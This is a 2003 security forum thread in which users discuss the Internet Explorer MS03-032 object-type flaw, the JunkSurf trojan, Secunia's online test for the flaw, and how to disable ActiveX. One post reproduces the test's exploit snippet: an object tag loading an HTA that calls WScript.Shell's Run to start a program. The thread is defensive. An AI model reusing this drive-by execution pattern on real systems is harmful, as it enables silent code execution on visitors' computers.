A severe vulnerability has been discovered. All IE users are recommended to read this article and can perform a vulnerability test over here:

http://www.secunia.com/MS03-032/

regards.

paul

And because of that I understand this one is still getting through



VSantivirus no. 1158 Year 7, Monday 8 of September of 2003

Troj/JunkSurf.A. It infects with single seeing a HTML
http://www.vsantivirus.com/junksurf-a.htm

Name: Troj/JunkSurf.A
Type: Trojan horse
Alias: Win32.JunkSurf, Download.Aduent.Trojan, Downloader-ED, TROJ_JUNKSURF.A, VBS_JUNKSURF.A, TrojanDownloader.Win32.Small.aq, Win32/JunkSurf.A.Trojan, Win32/JunkSurf.A, Trojan.Aduent, Troj/JSurf-A, Adware-Surfbar
Date: 5/set/03
Platform: Windows 32-bit
Sizes: 6,657 bytes(exe), 508,000 bytes(dll), 1.536 bytes, 932 bytes

This Trojan horse uses itself the vulnerability deciphers in the bulletin of security Ms03-032 de Microsoft:
Vulnerability of object labels

Internet Explorer cannot correctly determine a type of object that gives back of a Web server an attacker could use this soft spot to execute arbitrary code in the system of a user.

If a usuary one visits the Web site of the attacker, this one could with no need take advantage of this vulnerability no other intervention from the user. An attacker also could design a message of electronic mail in format HTML to take advantage of this vulnerability.

More information:

Ms03-032 cumulative Update for IE (822925)
http://www.vsantivirus.com/vulms03-032.htm

Paul - can you please explain the following para. on the Secunia website .... What kind of web page? ??? Am not too bright today. :(

WARNING:
If you are vulnerable, the Secunia website will execute Internet Explorer on your system and load a new web page.

-{ Quote: "
Paul - can you please explain the following para. on the Secunia website .... What kind of web page? ??? Am not too bright today. :(

WARNING:
If you are vulnerable, the Secunia website will execute Internet Explorer on your system and load a new web page.

" }-


It will then load this page...


http://www.secunia.com/MS03-032/TEST_OBJECT/test.html

Ah, no wonder it didn't work when I tested at that site... That link is attempting to use HTA to bring up the IE session. It looks like this is an additional reason for people to use the HTAstop utility or script control applications.

Correct, John ;)

Just another reason to be very careful using ActiveX, consider an IE replacement and a safe email client ;)

regards.

paul

Thanks for the update, will these HACKtiveX exploits never end?

-{ Quote: "
...will these HACKtiveX exploits never end?
" }-

That's funny! ;D

regards.

paul

-{ Quote: " quoting: Paul Wilders link=board=18;threadid=13531;start=0#msg86306 date=1063085421]
-{ Quote: " quoting: BlitzenZeus link=board=18;threadid=13531;start=0#msg86304 date=1063084932]
...will these HACKtiveX exploits never end?
" }-That's funny! ;D" }-

I've been calling it that since the early days of IE with Win95 since their proprietary applets have been the source of many security exploits ;)

If they didn't use HacktiveX, vbscripting, and even making new kinds of executables like .hta based on IE there wouldn't be as many exploits as there are today.

-{ Quote: " quoting: BlitzenZeus link=board=18;threadid=13531;start=0#msg86311 date=1063086106]
-{ Quote: " quoting: Paul Wilders link=board=18;threadid=13531;start=0#msg86306 date=1063085421]
-{ Quote: " quoting: BlitzenZeus link=board=18;threadid=13531;start=0#msg86304 date=1063084932]
...will these HACKtiveX exploits never end?
" }-That's funny! ;D" }-

-{ Quote: "I've been calling it that since the early days of IE with Win95 since their proprietary applets have been the source of many security exploits ;)" }-

That's comparatively long time!

-{ Quote: "If they didn't use HacktiveX, vbscripting, and even making new kinds of executables like .hta based on IE there wouldn't be as many exploits as there are today.
" }-

...and the list goes on ;)

regards.

paul" }-

In our company (2500 clients) we disabled ActiveX for the internet sites zone in IE. You don't want to know how many professionally used sites use ActiveX. We've got to move those addresses to the trusted sites zone in IE. That's a lot of work...

I plan to make a black list >:( >:( >:(

Andre,

-{ Quote: "I plan to make a black list" }-

Nice - post them in a new thread, and keep it up to date! ;D

regards.

paul

-{ Quote: "
Ah, no wonder it didn't work when I tested at that site... That link is attempting to use HTA to bring up the IE session. It looks like this is an additional reason for people to use the HTAstop utility or script control applications.
" }-

Hi John,

Nope, nothing to do : it does not use a *.hta but a*.exe ;)
Mabybe the test server was down or overcrowed when you perform the test : first time I ran it it also failed.

The only way to prevent is by unactivating activeX in Internet zone. (or at least ask before execution to get a warning)

Nevertheless, it a good thing to use htastop ;)

Rgds

Hey Jack,

Actually, I posted that, not John. ;) It does appear that HTA is used within the test itself... But, I never said the exploit was HTA related. All I said was:

-{ Quote: "Ah, no wonder it didn't work when I tested at that site... That link is attempting to use HTA to bring up the IE session. It looks like this is an additional reason for people to use the HTAstop utility or script control applications." }-

You see, the test didn't work for me even though I knew my system should be vulnerable to it once I had allowed all the IE functions. It wasn't until I checked John's link and realized that it used HTA that I understood. I used HTAstop to re-enable HTA on my system, and then I was able to get the exploit window to come up. (Well, I also had to disable TTT, of course.)

The test uses this link to demonstrate if your system is vulnerable to the exploit:
http://www.secunia.com/MS03-032/TEST_OBJECT/test.html It comes from the exploit portion of the test page:

<xml id="oExec">
<security>
<exploit>
<![CDATA[
<object data=http://www.secunia.com/MS03-032/TEST_OBJECT/test.html width=0 height=0>
]]>
</exploit>
</security>
</xml>

When I click on the link, it tries to execute "test.hta". If I right-click on the link and do a Save As... it calls up a download dialog box to save test.hta on my system. That's what I was talking about.

Now as far as the exploit itself goes, yes, I noticed the ActiveX use. In fact, I had to set ActiveX to prompt in the first place to even have the test happen. ;)

This is the code in the HTA file which is actually responsible for the newly created IE window that the test shows because a person's system was vulnerable to the original exploit...

<html><object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script>
wsh.Run("iexplore.exe \"http://www.secunia.com/MS03-032/VULNERABLE/?ID=0JN5lpFVhCJQHgtYKxldoOMto2tsInTW9ut\"");
</script></html>

I imagine they are using HTA because it's an easy way to run a script locally on a person's PC. Such a script can call up the new IE window to display the test results. Oh, interestingly enough, the "ID" field is unique for every test run. Perhaps they are using that to log the number of unique systems that come through to their webserver. :-\

-{ Quote: " quoting: LowWaterMark link=board=18;threadid=13531;start=0#msg86405 date=1063129432]
Hey Jack,

Actually, I posted that, not John. ;) It does appear that HTA is used within the test itself... But, I never said the exploit was HTA related. All I said was:

-{ Quote: "Ah, no wonder it didn't work when I tested at that site... That link is attempting to use HTA to bring up the IE session. It looks like this is an additional reason for people to use the HTAstop utility or script control applications." }-


" }-

Hi LowWaterMark,

So sorry for the missunderstanding ;)

I came to the same conclusions as you did, I have activeX on prompt an use htastop too :-D

Bu my so and so English let me understand that your post said that preventing hta execution prevented the failure in IE.

So sorry, I am trying hard improving my English : some more years needed :-D

Best regards,

Not problem at all Jack. ;)

Actually, I love digging into these kinds of things. Up until now I hadn't seen a real world case where HTA was run locally, without warning, based upon a web based link. (Of course, it needed ActiveX to fire it up, but still, it is interesting.)

I don't know that much about computing yet. What is Active X ?? I'm on Win XP Home. How do I disable it ?

Hi Joe:

Start Menu > Control Panel > Internet Options > Click Security Tab > Select Custom Level. The first seven options pertain to Active X > Disable those you wish. (I disable all of them in the Internet Zone, but enable all in the trusted zone). When finished click OK and you'll be prompted if you really want to change the settings - click yes or OK. If you're already on-line in IE you can simply click Tools > Internet Options and you'll get to the same place to change your options.

Regards, Rick

Rick, before I disable these ... what is Active X used for ?

-{ Quote: "
Rick, before I disable these ... what is Active X used for ?
" }-

Bad things in general :)

Done. I feel better already !

Thanks for the info Rick.

ActiveX: for how much longer? (http://www.internetnews.com/dev-news/article.php/3070591)

Joe,

ActiveX is used to run programs inside the IE browser.
ActiveX controls being executed on the users computer means that these programs can be exploited (abusing the ActiveX technology) by other malicious programs with a potentially destructive role.
For some websites to work properly you have to enable ActiveX. To do so you could add the sites where you want them to run to your trusted Sites, after disabling ActiveX for the Internet Zone.
Here are a few means to protect yourself from known abuse of ActiveX:
IE-Spyad (http://www.staff.uiuc.edu/~ehowes/resource.htm)
SpywareBlaster (http://www.javacoolsoftware.com/spywareblaster.html)

HTH,

Pieter

Man! am I glad I found this site ! I'm a fairly new computerer, and I've been getting a little paranoid in the last few months ! I've already installed the Spyware Blaster.
Say, how will I know if a website needs the ActiveX enabled ??
I'm on Win XP Home. I have Norton Internet Sec., and I'm behind a Router/Firewall. I also have the Spybot Search and Destroy.

What else should I do, or have, to be a little safer ??

~ Joe www.woodsshop.com/

Hi Joe,

If a website needs ActiveX to work you will get a warning that the page can not be displayed properly.

If you really need it to work and you trust the site, then you can add it to your trusted sites.

A good place to start reading is here: http://www.wilders.org/
Just follow the lead from there.
If you have any questions, you know where to find us. ;)

Regards,

Pieter

Hi Joe: There was a day when all you could do is just view a page on the web, now scripting and Active X make these pages interactive, like dancing balloons, nifty sparklers with ads and all that good (but exploitable) stuff. It’s typically necessary for playing games on the web, so you can interact with them. I often get the prompt Peiter mentioned and just click OK. Never had trouble viewing the page anyway to view the info I want, so if I miss a dancing balloon, in light of these risks it’s fine by me. I also disable File Downloads, that way if I hit tricked link, it won’t be able to download the first place. If I expect to download something I’m only a couple of clicks away from enabling it.

Over time you get a feel for what sites to put in your trusted zone. Since my regular zone is so restricted when I search around, if a site can’t give me want I want unless I expose these vulnerabilities, I just move to another source that can. Follow the links and other good advice these guys offer. I’ve never bad a single exploit/virus/trojan as a result. Among other things, don’t forget to follow good e-mail protocol, since e-mail represents the most prolific threat of all today (just be sure to view mail in plain text and be ultra leery of attachments). Anyway, gaining control of these security settings puts you far ahead of the game and most added security programs too. Later, Rick.

Oh well Java is almost as dangerous as activex. Well less so IMHO obviously because the way it works but still quite dangerous.

OK ! I've disabeled Axtive X. I visit three sites regularily, and have put all three in the Trusted zone. On one of them, jlconline.com, a forum site, I keep getting that warning when I switch between forums, and sometimes between posts. Do I have to live with this, or, is there something else I can do ??

Hi. You shouldn't. When you go to your security settings again you'll see four zones > Internet, Local Internet, Trusted sites and Restricted sites, click on Trusted sites, then Advanced and set those to enable active x, etc. then click OK. If the web address is properly entered into the trusted zone, those specific settings will apply when you visit that site - hence, no prompts. For instance, I don't want to hassle with changing my internet settings to get MS updates, so the update site is in my trusted zone where everything is enabled. Later, Rick

Sorry Joe, I meant click "Custom Level" not Advanced. To the right of the Trusted Sites logo, you'll see a button that says, "Sites" click that to add the web address.

If you have difficulty finding the site's specific address, go to the page or site you desire, right click your mouse, select "Properties" and the sites address will appear in the information. Simply highlight the address, copy and then paste it into that zone. Hope this helps. Rick

??? Unpatchable IE vulnerability 'in the wild'
http://www.silicon.com/news/500013/14/6192.html
29 September 2003
"...Security experts have warned that a vulnerability that has apparently been left un-patched by Microsoft is being exploited by attackers "in the wild".
- The 'object type' vulnerability, which was first acknowledged publicly by Microsoft on 20 August this year, allows an attacker to take control of a system by embedding malicious code in a web page. If the web page is viewed by an Internet Explorer browser - even a fully patched browser - the malicious code embedded in the web page will execute, experts say. Despite Microsoft acknowledging the patch doesn't work, it evidently has not yet issued a working fix for the vulnerability...
- Managing director of mail filtering software company Clearswift, Chy Chuawiwat, told ZDNet Australia the vulnerability is serious. "It's definitely there and it continues to be easy to exploit," he said. "It could run anything and the users wouldn't know." Chuawiwat suggests users disable ActiveX controls and plug-ins until Microsoft issues a patch that fixes the vulnerability. "For most enterprises there's no need for ActiveX so it should be disabled," he said. "Our standard policy would remove executables including ActiveX."
- Users can disable ActiveX controls in their Internet Explorer settings by clicking Tools, Internet Options, Security, and then modifying the settings for the 'Internet Zone'. Ironically, in order to patch the system through Microsoft's WindowsUpdate website when a fix becomes available, users must allow ActiveX controls and plug-ins to run in the Internet Zone."

:o
CERT® Incident Note IN-2003-04
- Exploitation of Internet Explorer Vulnerability
October 1, 2003
http://www.cert.org/incident_notes/IN-2003-04.html
"...Attacks include the installation of tools for launching distributed denial-of-service (DDoS) attacks and the use of the victim system's modem to dial pay-per-minute services thereby incurring significant expense to users. By convincing a user running a vulnerable version of Microsoft Internet Explorer (IE) to view an HTML document (e.g., a web page or HTML email), a remote attacker could execute arbitrary code with the privileges of the user...
- The vulnerability...exists due to an interaction between IE's MIME type processing and the way it handles HTML application (HTA) files embedded in OBJECT tags. When an HTA file is referenced by the DATA attribute of an OBJECT element, and the web server returns the Content-Type header set to application/hta, IE may execute the HTA file directly, without user intervention..."

Are you all trying to scare me about ActiveX ? I'm paranoid enough! being a fairly new computerer ! Everyone I ask dosen't know much about this, as if it's not a big deal.

How many people are being attacked right now ?

I disabeled it for the last few days, but decided to enable it again because of warnings I was getting at www.jlconline.com/ .

Say, can we meet at the middle, and only disable a few of those ActX settings ??

Isn't my Norton Internet , and router/firewall blocking whatever might come thru ?

-{ Quote: "Are you all trying to scare me about ActiveX ?" }-
;) - I don't believe -anyone- here is trying to "scare" anybody. The purpose is only to advise of a potential for catastrophic failure either on the users PC or network since they may be exposed to the vulnerability.
-{ Quote: "How many people are being attacked right now ?
" }-
??? That is an "unknown" difficult for anyone to quantify - any suggestions?
-{ Quote: "Say, can we meet at the middle, and only disable a few of those ActX settings ??" }-
- You'll have to ask those who are exploiting others - but until MS comes up with a fix/patch, the good advice is to -disable ActiveX in IE, -or- obtain/use another browser that is not affected by this vuln.
-{ Quote: "Isn't my Norton Internet , and router/firewall blocking whatever might come thru ?
" }-
:o - No, because you've already granted "defacto" access to your PC through the firewall by the browser...

;) See this thread (http://www.wilderssecurity.com/showthread.php?t=14547)...!!!

Cumulative Patch for Internet Explorer (828750)
Originally posted: October 3, 2003

(You can bet many tests will take place today - overtime, folks!)

OK, I went and installed those two new updates, and, I went and read that thread (which I really didn't understand). Now, what is this about a Test ??

Are these updates addressing the ActiveX issue ?

The update seems to have problems installing for some reason. When I update through windowsupdate, it lists it as IE6 SP1, installs it, and says it was successful. However, when I return, it says its not updated! If I download the patch for SP1 manually, it says I don't have SP1. If I try to reinstall IE6 SP1, it says I have a newer version than the installer has available. Is this purely screwed up? (I used HTAStop since the last time, does it mean I'm safe?)

Don't I have SP1 installed? (last time I had to use the manual 6.0 patch which was the botched patch anyways, but introduced the random broken images problem again, ironically, the non-working SP1 Oct. Patch that doesn't install all the way actually fixed the broken image problem)

??? Uncertain as to "why" the patch install failed...

But the WindowsUpdate site -requires- "Active X" be -enabled-...so if HTAStop was used, that very effectively -disables- "Active X"...hmmm...

-{ Quote: "
??? Uncertain as to "why" the patch install failed...

But the WindowsUpdate site -requires- "Active X" be -enabled-...so if HTAStop was used, that very effectively -disables- "Active X"...hmmm...
" }-
Hello,

HTAStop don't disable ActiveX ;) Just disable mshta.exe

First, open regedit and see wheather you have this key :
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{96543d59-497a-4801-a1f3-5936aacaf7b1}]
@="Q828750"
"IsInstalled"=dword:00000001
"Version"="6,0,2800,1264"
"ComponentID"="Q828750"

If yes, it's an error in WU and you should add this Entry in your Registry :
Name KB828750
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB828750]
@="Preventing reinstall KB828750"

CAUTION ! : don't add this key if you don't have the entry above.

Rgds,

I tried to take the test but my mcafee vius scan kept stopping the script from loading. I don't know if I passed or not ??? no other page ever loaded

???

"Just another reason to be very careful using ActiveX, consider an IE replacement and a safe email "

Quote from paul,(No I don't know how you tech's do the quotes).

Just wondering what you would recomend, as a sub for it??

Thanks for all the advice and help "Wilders" is giving the world!!

8)

HI,
I hope this is in the correct forum. I've just recieved notification of the latest vulnerabilities (http://www.channelweb.com/sections/Newscenters/Article.asp?newscenterID=55&ArticleID=47861) in windows and IE. Now, from past experience, some of these patches can cause other (un)related problems. My question is - if users are using properly(?) configured firewalls, AV software, Trojan Scanners and possibly PG, does that obviate the need to patch immediately

just a comment from a newbes. Just took the little test. Hee hee, the firewall stopped it cold. Yes sir, the firewall. After peeking at the test its certain that my "other" security would have prevented it executing.
Didn't read the entire thread here but what was read never mentioned a firewall. Oh, actX is wide open on this OS. Using IE

TCP Connection to {websrv.secunia.com} [213.1:80] was blocked {ip address clipped out}


"internet explorer cannot open the internet site {http://secunia.com/ms03-032/test_object/test.html}"

Hi Paul
I done the test and sure enough secuna was loaded on to the other page.What does this mean and do i need to do something to fix it.i am only learning about computers and all the security stuff therefore i only understand half of what i read but guess i will learn sometime.hope this is not to dumb a question but i can only learn thru asking questions
thank you
Rita :-[

hello,rita i am learning too.i think this will stop it.go to post no.8 in this thread,and copy bigc's advice.i think there are also two more activex settings below bigc's settings.ill try and take a screenshot to show how ive been told to have it set.heres the link.
http://www.wilderssecurity.com/showthread.php?t=41342
there is also htastop just download and then block
http://www.nsclean.com/htastop.html

here's the screenshot...